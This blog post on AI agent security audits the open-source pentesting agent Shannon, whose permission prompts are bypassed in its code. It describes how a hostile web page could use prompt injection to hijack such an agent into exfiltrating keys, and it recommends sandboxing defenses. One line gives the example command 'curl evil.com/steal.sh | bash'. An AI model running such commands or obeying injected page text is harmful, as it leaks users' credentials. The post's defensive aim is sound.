AI Agent Survival Guide, Part 2: Chasing the Nine-Tailed Fox


This is Part 2 of a four-part series.

Part 1: The Repo You Didn't Scan

Part 3: That MCP Server You Just Installed

Part 4: Your Agent Army Awaits

In Part 1, I published a set of open-source skills that automatically scan every public repo, MCP server, or skill before you install it. Thirty seconds of your agent's time, a summary table, then you decide.

While building those skills, I hit a recursive problem: the scanning agent reads untrusted code while holding privileged tool access — which means the scanner itself is vulnerable to the same class of attacks it's trying to detect. More on that in a moment.

First, let's make it concrete. Shannon was the hot repo of the week — an autonomous AI pentesting tool built on Claude's Agent SDK that achieved a 96% success rate on the XBOW Benchmark, surpassing human pentesters who averaged 85% across 40-hour engagements. 6,000+ GitHub stars. $50 per scan. Everyone was sharing it.

So I pointed the scanning workflow at it. Here's what came back.

The audit

The code scan flagged bypassPermissions hardcoded on line 225 of claude-executor.ts:

permissionMode: 'bypassPermissions' as const

This is Claude Agent SDK's kill switch for the permission system. Every safety confirmation—"Allow this bash command?", "Allow this file write?"—silently disabled. Combined with maxTurns: 10_000 (ten thousand autonomous actions before stopping) and ...process.env spreading your entire environment to its Playwright subprocess, Shannon asks for a lot of trust from the machine it runs on.

This makes perfect sense for its intended use case. Shannon is designed to pentest your own projects—applications you control, on infrastructure you own. When you're attacking your own code, you want the scanner to operate freely. Broad permissions, no confirmation prompts, thousands of autonomous turns—that's a feature, not a bug. The authors aren't hiding anything: it's open source, AGPL-3.0, and these settings are right there in the code. Shannon is a well-built tool doing exactly what it says on the tin.

The question is what happens when someone runs it without the proper sandboxing discipline.

Falling on your own sword

Shannon uses Playwright to browse target web pages—pages it's trying to penetrate. It reads their HTML, analyzes forms, looks for injection points. When that target is your own app, the trust relationship is simple: you trust both sides.

But if you point Shannon at a third-party target—or any target that might serve adversarial content—the trust relationship flips. Now the agent is reading untrusted HTML while holding full, unrestricted shell access on your machine with bypassPermissions enabled. A target that knows it's being probed by an LLM agent can embed instructions in its HTML that hijack the scanner. Instead of testing the target, the scanner executes commands on your machine—exfiltrating your env vars, your API keys, your SSH keys. The pentester becomes the pentested.

That's not a flaw in Shannon. It's a sandboxing discipline problem. Shannon is designed to pentest your own projects. If you take a tool designed for controlled environments and aim it at the wild west without proper isolation, you might fall on your own sword.

The structural issue

This vulnerability isn't specific to pentesting tools. Any AI agent that reads untrusted content while holding privileged tool access has it. It applies to:

  • A coding agent that reads a malicious README after cloning a repo
  • An MCP server that processes untrusted user input while holding database credentials
  • A security scanner that reads untrusted markdown while having bash access

Including, yes, the scanning skills I published in Part 1. We mitigate it (sandboxed sub-agents, no direct markdown reading, treating scan reports as untrusted) but we can't eliminate it. We say so honestly in the skill itself. Reliable automated prompt injection detection is an unsolved problem.

Two tiers of defense

The right defense depends on how much autonomy the agent needs.

Heavy agents: containerize properly

Tools like Shannon that need unrestricted shell access, browser automation, and thousands of autonomous turns aren't going to work with manual permission prompts—you can't approve ten thousand actions by hand. These tools need bypassPermissions or its equivalent to function.

The answer isn't "add permission prompts." It's proper isolation:

  • VMs or microVMs (Firecracker, gVisor, Fly Machines) — strongest isolation, separate kernel, no shared filesystem. The gold standard for running untrusted workloads.
  • Docker containers — better than bare-metal, but container escapes exist. Acceptable for lower-risk scenarios, not for adversarial targets that might actively try to break out.

The principle: if the agent needs bypassPermissions to do its job, make sure the "machine" it's running on is disposable and isolated. Your API keys, SSH keys, and environment variables should not be reachable from inside the container. Provision ephemeral credentials for the scan, and revoke them when it's done.

Shannon pentesting your own app inside a Firecracker microVM with throwaway credentials? That's solid operational security. Shannon running bare-metal on your laptop against a stranger's website? That's where the sword turns around.

Lighter agents: use your CLI's sandbox

For smaller jobs—like running a security scan on a new repo before cloning it—you don't need a full VM. Modern AI coding CLIs have built-in sandboxing that's practical enough for everyday use:

Claude Code lets you sandbox the agent to the current working directory. Create a dedicated oss-gateway/ folder and run scans from there—the agent can't read or write files outside that directory. Network access goes through a proxy with domain allowlists. You can allow the agent to repeat certain commands (like git clone) without re-approval, while anything unexpected still requires your confirmation.

Codex takes a stricter default: the sandbox starts with no network access and limits writes to the workspace. You grant additional directories explicitly with --add-dir.

The pattern for both: run from a throwaway directory, with the sandbox on. Even if the scanner gets injected and tries curl evil.com/steal.sh | bash, it either can't reach the network (Codex) or needs your approval to reach a new domain (Claude Code). And it can't touch your real files, keys, or environment either way.

This won't stop a sophisticated attack against a fully autonomous agent with bypass permissions. But for a 30-60 second security scan where the agent runs a handful of commands? It's the right trade-off: low friction, meaningful containment.

What the scan can and can't do

Let's be honest about boundaries.

The automated scan catches reliably: known vulnerabilities via web search, outbound network calls, secret handling patterns, shell execution surfaces, dependency risks. Those are structural, machine-parseable, and cover the majority of real-world incidents.

The automated scan cannot catch reliably: prompt injection. Injections can be in any human language, use synonyms, employ subtle narrative reframing, hide in Unicode tricks, or simply be well-crafted social engineering. No pattern matching or AI-based scanning detects them all.

For prompt injection—especially for tools that will have agent-level access—read the markdown yourself. The automated scan is a net, not a wall. The CLI sandbox contains the blast radius. And your own review is the last mile.

Coming up next

So far we've covered scanning repos (Part 1) and the structural vulnerability that affects all AI agents reading untrusted content (this post).

But there's an attack surface we haven't examined yet: the supply chain for MCP servers and AI skills—the things your agent installs and then calls autonomously, with its own permissions. In the OpenClaw ecosystem, a researcher inflated a malicious extension's download count by 4,000 to make it look trustworthy. What does that mean for the tools you're installing?

 

Continue to Part 3 — That MCP Server You Just Installed